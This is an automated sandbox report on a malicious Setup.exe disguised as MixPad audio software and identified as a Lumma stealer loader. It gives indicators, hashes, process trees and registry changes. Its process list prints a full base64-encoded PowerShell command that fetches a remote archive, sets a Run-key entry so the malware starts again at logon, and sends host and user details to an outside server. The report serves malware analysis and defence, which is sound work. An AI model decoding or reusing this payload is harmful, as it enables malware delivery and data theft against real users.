File name:

Setup.exe

Full analysis: https://app.any.run/tasks/eb80fd15-fe98-4e9b-ab45-db606afef8e5
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: November 23, 2024, 11:06:53
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
lumma
stealer
pastebin
loader
autoit
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5:

9F255C59CB7291F7170E4418A649BD8E

SHA1:

61FF59F20F18BD99847DEF7B88B3F8350D778DE3

SHA256:

22FBCD9BBA70FE43CCD1F1CA55B79C1D74238B7A3CACBFFAD165FC07E70D832B

SSDEEP:

98304:hdsv2DOl9kIq/tBgdD07yvaY5M0BUuc17BCxrvUMEvNa7bKPisuZLeUs7H3tdupn:ROY0hN+FIGI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Known privilege escalation attack

      • dllhost.exe (PID: 5000)

    • LUMMA has been detected (SURICATA)

      • msiexec.exe (PID: 3436)

    • Stealers network behavior

      • msiexec.exe (PID: 3436)

    • Actions looks like stealing of personal data

      • msiexec.exe (PID: 3436)

    • Steals credentials from Web Browsers

      • msiexec.exe (PID: 3436)

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 5496)
      • msiexec.exe (PID: 3436)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5400)
      • powershell.exe (PID: 5496)
      • powershell.exe (PID: 4980)

    • LUMMA has been detected (YARA)

      • msiexec.exe (PID: 3436)

  • SUSPICIOUS

    • Creates file in the systems drive root

      • dllhost.exe (PID: 5000)

    • Starts application with an unusual extension

      • Setup.exe (PID: 6016)
      • msiexec.exe (PID: 3436)

    • The process executes Powershell scripts

      • msiexec.exe (PID: 3436)

    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 5496)

    • Starts POWERSHELL.EXE for commands execution

      • msiexec.exe (PID: 3436)
      • powershell.exe (PID: 5496)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 5496)

    • Base64-obfuscated command line is found

      • powershell.exe (PID: 5496)

    • Application launched itself

      • powershell.exe (PID: 5496)

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 5496)

    • Checks whether the computer is part of a domain (POWERSHELL)

      • powershell.exe (PID: 4980)

    • Starts the AutoIt3 executable file

      • msiexec.exe (PID: 3436)

  • INFO

    • Checks supported languages

      • Setup.exe (PID: 4320)
      • Setup.exe (PID: 6016)
      • more.com (PID: 4128)
      • 6GZ64C.com (PID: 5316)

    • Reads security settings of Internet Explorer

      • dllhost.exe (PID: 5000)

    • Reads the machine GUID from the registry

      • Setup.exe (PID: 4320)

    • Reads the computer name

      • Setup.exe (PID: 4320)
      • more.com (PID: 4128)
      • Setup.exe (PID: 6016)

    • Create files in a temporary directory

      • Setup.exe (PID: 6016)
      • Setup.exe (PID: 4320)
      • more.com (PID: 4128)
      • msiexec.exe (PID: 3436)

    • The process uses the downloaded file

      • dllhost.exe (PID: 5000)
      • powershell.exe (PID: 5400)

    • Reads the software policy settings

      • msiexec.exe (PID: 3436)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 5400)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5400)

    • Disables trace logs

      • powershell.exe (PID: 5496)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 5400)

    • Checks proxy server information

      • powershell.exe (PID: 5496)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4980)

    • Creates files or folders in the user directory

      • msiexec.exe (PID: 3436)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3436)

    • Reads Windows Product ID

      • 6GZ64C.com (PID: 5316)

    • Reads mouse settings

      • 6GZ64C.com (PID: 5316)

    • Reads CPU info

      • 6GZ64C.com (PID: 5316)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:11:02 01:07:45+00:00
ImageFileCharacteristics: Executable, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 8
CodeSize: 4734464
InitializedDataSize: 6048256
UninitializedDataSize: -
EntryPoint: 0x468c62
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x0017
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (Australian)
CharacterSet: Unicode
CompanyName: NCH Software
FileDescription: MixPad Multitrack Recording Software
FileVersion: 12.52+
ProductVersion: 12.52+
ProductName: MixPad
LegalCopyright: NCH Software
InternalName: MixPad
OriginalFileName: MixPad.exe
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
123
Monitored processes
12
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start setup.exe no specs CMSTPLUA setup.exe no specs more.com no specs conhost.exe no specs #LUMMA msiexec.exe powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs 6gz64c.com no specs

Process information

PID
CMD
Path
Indicators
Parent process
1668\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2828\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exemore.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3436C:\WINDOWS\SysWOW64\msiexec.exeC:\Windows\SysWOW64\msiexec.exe
more.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\local\temp\dpwtrsonvrtk
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
3832\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4128C:\WINDOWS\SysWOW64\more.comC:\Windows\SysWOW64\more.comSetup.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
More Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\more.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\ulib.dll
4320"C:\Users\admin\Desktop\Setup.exe" C:\Users\admin\Desktop\Setup.exeexplorer.exe
User:
admin
Company:
NCH Software
Integrity Level:
MEDIUM
Description:
MixPad Multitrack Recording Software
Exit code:
0
Version:
12.52+
Modules
Images
c:\users\admin\desktop\setup.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
4980"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NOpr -eX BYPaSs -wiNdoWSt Hidd -e JABvAGYAYgB3AD0AJwBoAEsAYwBVADoAXABTAG8AZgBUAHcAQQByAGUAXABDAEwAQQBTAHMARQBzAFwAJwA7ACAAJABLADIAVABmAHoAPQAnAGMAOgBcAHAAUgBvAGcAUgBBAE0AIABGAGkAbABlAHMAXAAnADsAIAAkAG4AUwBrAEYANwA9ADAAOwAgACQANQA4ADQAZgA9ACgAZwBFAFQALQB3AE0AaQBPAEIASgBlAEMAVAAgAC0AQwBsAGEAcwBTACAAVwBpAE4AMwAyAF8AYwBPAG0AUABVAFQARQBSAFMAeQBzAFQAZQBtACkALgBwAEEAcgBUAE8AZgBEAG8AbQBBAGkAbgA7ACAAJABYAFQAVQA4AD0AJwBoAGsAYwBVADoAXABzAG8AZgBUAHcAQQByAGUAXAAnADsAIAAkAEsAaQByAEgAPQAnAEgAawBMAE0AOgBcAHMAbwBGAHQAdwBBAHIARQBcAEMAbABBAFMAcwBlAHMAXAAnADsAIAAkADUAdAB2AFoAUAA9ACQAZQBOAHYAOgBMAE8AYwBBAGwAYQBwAHAAZABhAFQAYQArACcAXABQAFIATwBHAFIAQQBtAHMAXAAnADsAIAAkAHYAagBUAEEAPQBAACgAIAAkAE8AZgBiAFcAKwAnAEEATwBwAFAAJwA7ACAAJABvAGYAYgBXACsAJwBrAGUARQBwAGsARQBZACcAOwAgACQASwBpAHIASAArACcAQgBDAHYAQQB1AEwAVAAnADsAIAAkADUAVABWAFoAcAArACcASwBlAGUAUABrAEUAeQAtAEQAZQBzAEsAVABvAFAAXABrAGUARQBwAGsARQB5ACAARABlAHMAawBUAG8AcAAuAGUAWABFACcAOwAgACQAeAB0AFUAOAArACcAUgBFAEEATAAgAHMAZQBjAHUAcgBJAFQAeQBcAEIAQwBWAEEAdQBMAFQAJwA7ACAAJABvAEYAYgBXACsAJwBDAHkAUABoAGUAUgBvAGMAawAnADsAIAAkADUAdAB2AFoAUAArACcAVAByAEUAegBPAFIAIABTAFUASQBUAEUAXAB0AHIARQBaAE8AcgAgAFMAVQBJAHQARQAuAGUAeABFACcAOwAgACQAeAB0AHUAOAArACcAbQBJAEMAUgBPAHMATwBmAHQAXAB3AEkAbgBkAG8AVwBTAFwAYwBVAHIAcgBFAE4AVAB2AGUAcgBTAEkAbwBOAFwAdQBuAEkAbgBzAHQAQQBMAGwAXABiAGkAVABiAE8AeABBAFAAcAAnADsAIAAkADUAVAB2AFoAcAArACcAYwB5AHAASABFAFIAbwBjAGsAIABDAFkAcwBZAE4AQwBcAEMAWQBQAGgARQByAG8AYwBrACAAQwBZAFMAeQBuAEMALgBlAFgAZQAnADsAIAAkAEsAMgBUAGYAegArACcAQgBpAFQAYgBvAHgAXABCAEkAdABiAG8AWAAuAEUAeABFACcAOwAgACQAbwBGAGIAVwArACcAbwBOAGUASwBFAFkALQB3AEEAbABMAGUAdAAnADsAIAAkADUAdAB2AHoAUAArACcAawBlAEUAVgBPAC0AVwBBAEwATABFAFQAXABLAGUARQBWAG8AIABMAEkAbgBrAC4AZQBYAEUAJwA7ACAAJABvAEYAQgBXACsAJwBMAEkAcQBVAGkARABuAGUAVAB3AG8AUgBrACcAOwAgACQAbwBGAEIAVwArACcAdAByAGUAWgBvAFIAUwBVAEkAdABFACcAOwAgACQAawAyAHQARgBaACsAJwBiAGwAbwBDAEsAUwBUAFIAZQBhAE0AXABCAGwATwBjAEsAcwB0AFIAZQBhAE0AIABHAFIAZQBlAE4AXABCAEwATwBDAGsAcwB0AHIARQBBAE0AIABHAHIAZQBFAG4ALgBlAHgARQAnADsAIAAkAGsASQByAEgAKwAnAGwAZQBkAGcAZQByAGwAaQB2AGUAJwA7ACAAJABYAHQAdQA4ACsAJwBiAEkAVABiAE8AeABBAHAAcAAnADsAIAAkAEsAMgB0AEYAWgArACcATwBuAEUAawBlAFkAXABvAG4AZQBLAEUAeQAuAGUAeABFACcAOwAgACQAbwBmAEIAdwArACcAawBFAGUAVgBPACcAOwAgACQASwAyAFQAZgBaACsAJwBCAEMAIABWAGEAVQBMAFQAXABCAEMAdgBBAFUATAB0AC4ARQB4AEUAJwA7ACAAJAA1AFQAdgB6AHAAKwAnAHIAQQBiAEIAWQAtAGQARQBTAEsAVABvAFAAXAByAGEAQgBiAFkAIABkAGUAcwBrAHQAbwBQAC4ARQB4AGUAJwA7ACAAJABLADIAVABGAFoAKwAnAEwAZQBkAGcAZQByACAATABpAHYARQBcAEwAZQBEAEcARQByACAAbABJAFYAZQAuAGUAWABlACcAOwAgACkAOwAgACQAcgB6AFEAYQA1AD0AJABWAEoAVABhAC4ATABFAE4ARwB0AGgAOwAgAEkARgAgACgAJAA1ADgANABGACkAIAB7ACQAbgBTAEsAZgA3AD0AMQB9ACAAZQBsAFMARQAgAHsAIABGAG8AUgAgACgAJABnAGsAWABsAD0AMAA7ACAAJABnAGsAWABMACAALQBsAFQAIAAkAHIAWgBxAGEANQAgAC0AYQBOAGQAIAAkAG4AcwBrAEYANwAgAC0ARQBxACAAMAA7ACAAJABnAEsAeABMACsAKwApACAAewAgAGkAZgAgACgAdABlAHMAdAAtAHAAYQBUAEgAIAAkAHYASgB0AGEAWwAkAEcAawB4AEwAXQApACAAewAkAG4AUwBLAEYANwA9ADEAfQA7AH0AOwB9ADsAIABpAEYAIAAoACQAbgBTAEsARgA3ACAALQBFAFEAIAAxACkAIAB7ACAAWwBuAEUAVAAuAHMAZQBSAHYASQBjAGUAUABPAEkATgBUAG0AQQBOAGEAZwBFAFIAXQA6ADoAcwBFAGMAVQBSAGkAdABZAHAAUgBPAHQATwBjAG8ATAAgAD0AIABbAE4AZQB0AC4AUwBFAGMAdQBSAGkAdAB5AFAAUgBvAHQAbwBDAG8AbABUAHkAUABlAF0AOgA6AHQATABTADEAMgA7ACAAJABVADkAcwBPAHQAeQA9ACcAaAB0AHQAcABzADoALwAvAHMAbgBvAHcAcQB1AGUAZQBuAC4AcwBpAHQAZQAvAHMAbgBvAHcAegAvAHMAbgBvAHcALgB6AGkAcAAnADsAIAAkAHkAdABCAGQANABTAD0AJwBEAGUAZgByAGEAZwBDAGwAaQBlAG4AdAAnADsAIABDAGgARABJAFIAIAAkAEUATgBWADoAYQBQAHAAZABhAHQAQQA7ACAAJABKADgAZgBlAHEAeAByAFcAPQBHAEUAdAAtAEMATwBtAE0AQQBuAEQAIABTAFQAYQByAFQALQBCAGkAdABTAHQAcgBhAE4AUwBmAGUAcgAgAC0ARQBSAFIATwBSAGEAYwB0AEkATwBOACAAUwBpAEwARQBOAFQAbAB5AGMATwBOAFQASQBOAHUARQA7ACAAJABXAHAAaABiAEEATwBxAFcAPQAiAHsAMAB9AFwAewAxAH0AIgAgAC0AZgAgACQARQBuAFYAOgBBAHAAcABkAGEAdABBACwAIAAkAHkAdABCAGQANABTADsAIABUAHIAWQAgAHsAIABOAGUAdwAtAGkAVABFAG0AIAAtAHAAYQBUAGgAIAAkAGUAbgBWADoAQQBQAHAARABhAFQAQQAgAC0ATgBBAE0ARQAgACQAeQB0AEIAZAA0AFMAIAAtAGkAVABlAE0AVABZAHAARQAgACcAZABpAHIAZQBjAHQAbwByAHkAJwA7ACAAQQBkAGQALQBUAHkAcABlACAALQBBAFMAUwBlAG0AYgBsAHkAbgBBAG0AZQAgAFMAeQBTAHQAZQBNAC4ASQBPAC4AQwBvAE0AcAByAEUAcwBTAGkATwBOACwAIABzAFkAUwBUAGUAbQAuAGkAbwAuAEMATwBNAFAAcgBlAHMAcwBpAG8AbgAuAGYAaQBsAEUAUwBZAFMAVABlAG0AIAAtAGUAUgBSAE8AUgBhAEMAdABJAE8ATgAgAFMASQBsAGUAbgB0AGwAWQBjAE8AbgBUAEkATgB1AEUAOwAgACQAbwBUAHYAUQBUAG0AVAA9ACgAQwBVAFIAbAAgAC0AVQByAGkAIAAkAFUAOQBzAE8AdAB5ACAALQBVAHMARQBCAEEAUwBJAEMAUABBAFIAUwBJAG4AZwApAC4AYwBPAG4AVABlAE4AdAA7ACAAJAB1AHAASwAzADgANgA9AG4ARQB3AC0ATwBiAGoAZQBjAHQAIABzAFkAUwBUAGUAbQAuAGkATwAuAE0ARQBNAE8AcgBZAHMAVAByAEUAQQBNADsAIAAkAHUAcABLADMAOAA2AC4AdwByAGkAVABlACgAJABvAFQAdgBRAFQAbQBUACwAIAAwACwAIAAkAG8AVAB2AFEAVABtAFQALgBMAEUATgBHAHQASAApADsAIAAkAHUAcABLADMAOAA2AC4AcwBFAEUAawAoADAALAAgAFsAUwBZAFMAVABlAE0ALgBJAE8ALgBzAGUARQBrAG8AcgBpAEcAaQBuAF0AOgA6AEIARQBHAGkATgApACAAfAAgAG8AdQBUAC0ATgB1AGwATAA7ACAAJABiADEAcwBhAHEAcQBRAHIAPQBuAEUAdwAtAG8AYgBqAEUAYwB0ACAAcwBZAHMAdABlAE0ALgBJAE8ALgBDAE8AbQBQAHIARQBzAFMASQBPAG4ALgBaAEkAcABBAHIAYwBIAEkAdgBFACgAJAB1AHAASwAzADgANgAsACAAWwBzAFkAUwB0AEUAbQAuAEkAbwAuAGMAbwBNAHAAUgBFAHMAUwBJAG8AbgAuAFoASQBQAGEAUgBjAEgASQB2AEUATQBPAEQARQBdADoAOgBSAGUAYQBkACkAOwAgAGYATwBSAGUAQQBDAGgAKAAkAFoAZQBaAHEAcwBIACAAaQBuACAAJABiADEAcwBhAHEAcQBRAHIALgBlAG4AdAByAEkARQBzACkAIAB7ACAAJABCAFkAdQBjADgATQA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABXAHAAaABiAEEATwBxAFcALAAgACQAWgBlAFoAcQBzAEgALgBOAGEATQBFADsAIAAkADYAMwBZADMAcgBqADUARgA9ACQAWgBlAFoAcQBzAEgALgBvAHAAZQBOACgAKQA7ACAAJABGADUAWQBkAFcAOABGAD0AWwBTAHkAcwB0AGUAbQAuAGkAbwAuAGYASQBMAEUAXQA6ADoAQwByAGUAYQBUAGUAKAAkAEIAWQB1AGMAOABNACkAOwAgACQANgAzAFkAMwByAGoANQBGAC4AQwBvAHAAWQB0AG8AKAAkAEYANQBZAGQAVwA4AEYAKQA7ACAAJABGADUAWQBkAFcAOABGAC4AYwBMAG8AcwBlACgAKQA7ACAAJAA2ADMAWQAzAHIAagA1AEYALgBjAGwAbwBTAGUAKAApADsAfQAgACQAYgAxAHMAYQBxAHEAUQByAC4AZABJAHMAUABPAHMARQAoACkAOwAgACQAdQBwAEsAMwA4ADYALgBEAGkAcwBQAG8AUwBFACgAKQA7ACAAfQAgAGMAYQB0AGMAaAAgAHsATgBlAHcALQBpAFQARQBtACAALQBQAEEAVABIACAAJABFAG4AdgA6AGEAUABwAEQAQQB0AGEAIAAtAG4AQQBNAGUAIAAkAHkAdABCAGQANABTACAALQBpAHQAZQBtAHQAeQBwAGUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgACQASQB1ADQAWgBuADEAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAG4AbwB3AHEAdQBlAGUAbgAuAHMAaQB0AGUALwBzAG4AbwB3AHoALwAnADsAIAAkAHQASQBWAHAAcABrAEIAPQBAACgAJwBUAEMAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwByAGUAbQBjAG0AZABzAHQAdQBiAC4AZQB4AGUAJwAsACAAJwBtAHMAdgBjAHIAMQAwADAALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcALAAgACcAbgBzAG0AXwB2AHAAcgBvAC4AaQBuAGkAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAHAAYwBpAGMAYQBwAGkALgBkAGwAbAAnACwAIAAnAFAAQwBJAEMASABFAEsALgBEAEwATAAnACwAIAAnAEgAVABDAFQATAAzADIALgBEAEwATAAnACwAIAAnAEEAdQBkAGkAbwBDAGEAcAB0AHUAcgBlAC4AZABsAGwAJwAsACAAJwBOAFMATQAuAEwASQBDACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AaQBuAGkAJwAsACAAJwBQAEMASQBDAEwAMwAyAC4ARABMAEwAJwApADsAIABJAEYAIAAoACQASgA4AGYAZQBxAHgAcgBXACkAIAB7ACAAJAB0AEkAVgBwAHAAawBCACAAfAAgAEYAbwByAEUAQQBDAEgALQBvAGIAagBFAEMAdAAgAHsAIAAkAEcAMQA2AFEANABhAFUAPQAkAEkAdQA0AFoAbgAxACsAJABfADsAIAAkAEoAbgBzAEEANQBmAHgAVQA9ACQAVwBwAGgAYgBBAE8AcQBXACsAJwBcACcAKwAkAF8AOwAgAFMAdABhAFIAdAAtAGIASQB0AFMAVABSAEEATgBzAEYAZQBSACAALQBzAE8AdQByAEMARQAgACQARwAxADYAUQA0AGEAVQAgAC0ARABFAFMAVABJAE4AYQBUAGkAbwBOACAAJABKAG4AcwBBADUAZgB4AFUAOwAgAH0AOwB9ACAAZQBMAHMAZQAgAHsAIAAkAHQASQBWAHAAcABrAEIAIAB8ACAAZgBPAHIAZQBhAGMAaAAtAE8AQgBqAEUAQwB0ACAAewAgACQARwAxADYAUQA0AGEAVQA9ACQASQB1ADQAWgBuADEAKwAkAF8AOwAgACQASgBuAHMAQQA1AGYAeABVAD0AIgB7ADAAfQBcAHsAMQB9ACIAIAAtAGYAIAAkAFcAcABoAGIAQQBPAHEAVwAsACAAJABfADsAIAAkAHgAUQBmAHkANABGAGUAcwA9ACcAYgBJAHQAcwBhAEQATQBJAG4ALgBlAFgARQAgAC8AdAByAEEAbgBTAGYAZQByACAAWAA1AHkANgBZAEoAIAAvAGQATwBXAG4ATABvAEEARAAgAC8AUABSAGkATwByAEkAVAB5ACAATgBPAHIAbQBhAGwAIAAnACsAJABHADEANgBRADQAYQBVACsAJwAgACcAKwAkAEoAbgBzAEEANQBmAHgAVQA7ACAAJgAgACQAeABRAGYAeQA0AEYAZQBzADsAfQA7ACAAfQA7ACAAfQA7ACAAJAA2AGEATABaAHcAVQA9AEcAZQB0AC0ASQB0AEUAbQAgACQAVwBwAGgAYgBBAE8AcQBXACAALQBmAG8AUgBDAGUAOwAgACQANgBhAEwAWgB3AFUALgBBAHQAdABSAEkAQgBVAFQAZQBzAD0AJwBIAGkAZABkAGUAbgAnADsAIABDAGQAIAAkAFcAcABoAGIAQQBPAHEAVwA7ACAAJABQAEsAYQBUAGgAeAB2ADQAPQAkAFcAcABoAGIAQQBPAHEAVwAsACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnACAALQBKAE8AaQBuACAAJwBcACcAOwAgAE4AZQBXAC0ASQB0AEUATQBwAFIAbwBQAGUAUgBUAHkAIAAtAFAAYQB0AEgAIAAnAGgAawBDAHUAOgBcAFMATwBmAHQAdwBhAHIARQBcAE0ASQBDAFIAbwBTAE8AZgB0AFwAVwBJAE4ARABPAFcAUwBcAEMAdQByAFIAZQBuAFQAdgBlAFIAUwBJAG8ATgBcAHIAdQBuACcAIAAtAG4AQQBNAGUAIAAkAHkAdABCAGQANABTACAALQBWAGEATABVAGUAIAAkAFAASwBhAFQAaAB4AHYANAAgAC0AcABSAG8AUABFAFIAVAB5AHQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwAgAHMAVABhAFIAVAAgAEMATABJAEUAbgBUADMAMgAuAEUAWABFADsAIAAkADMAMgBIAGEATwA9AHAAcwAgAGMAbABpAGUAbgB0ADMAMgAgAC0AZQByAHIAbwByAGEAQwB0AGkATwBuACAAcwBpAEwAZQBOAFQATAB5AEMATwBOAHQASQBuAHUAZQA7ACAAJABTAGYAYgAwAD0AIgBoAHQAdABwAHMAOgAvAC8AcwBuAG8AdwBxAHUAZQBlAG4ALgBzAGkAdABlAC8AcwBuAG8AdwBzAC8AcgBlAGMAYQBsAGwAaQBuAGcALgBwAGgAcAA/AGMAcABuAG0AZQA9ACQARQBuAHYAOgBjAE8ATQBwAHUAdABlAHIATgBBAE0ARQAmAHUAcwBuAG0AZQA9ACQAZQBuAFYAOgBVAHMARQByAE4AQQBtAEUAJgBwAGEAcgBhAG0APQAiADsAIABJAEYAIAAoACQAMwAyAEgAYQBPAC4AaQBkACkAIAB7ACAAJABxAHQAZgBDAEQAPQAkAFMAZgBiADAAKwAnAHAASABxAEIAJwA7ACAAVwBnAGUAdAAgACQAcQB0AGYAQwBEACAALQB1AHMARQBCAEEAUwBJAEMAcABBAHIAUwBJAG4ARwA7AH0AIABlAGwAcwBlACAAewAgACQAcQB0AGYAQwBEAD0AJABTAGYAYgAwACsAJwBrAHoAaABVADIAJwA7ACAAVwBnAGUAdAAgACQAcQB0AGYAQwBEACAALQBVAHMAZQBiAGEAcwBpAGMAcABhAHIAUwBpAE4ARwA7AH0AOwAgAH0AOwA=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
5000C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}C:\Windows\SysWOW64\dllhost.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\windows\syswow64\combase.dll
5316"C:\Users\admin\AppData\Roaming\6GZ64C.com" "C:\Users\admin\AppData\Roaming\QKZ2HX.csv"C:\Users\admin\AppData\Roaming\6GZ64C.commsiexec.exe
User:
admin
Company:
AutoIt Team
Integrity Level:
HIGH
Description:
AutoIt v3 Script (Beta)
Exit code:
0
Version:
3, 3, 15, 1
Modules
Images
c:\users\admin\appdata\roaming\6gz64c.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\psapi.dll
c:\windows\syswow64\user32.dll
5400powershell -exec bypass -f "C:\Users\admin\AppData\Local\Temp\HF28QJ06Y4TY885OYJH7SL.ps1"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
Total events
18 287
Read events
18 271
Write events
16
Delete events
0

Modification events

(PID) Process:(4320) Setup.exeKey:HKEY_CURRENT_USER\SOFTWARE\NCH Software\MixPad\Software
Operation:writeName:SVar
Value:
LLIBControloff
(PID) Process:(5000) dllhost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
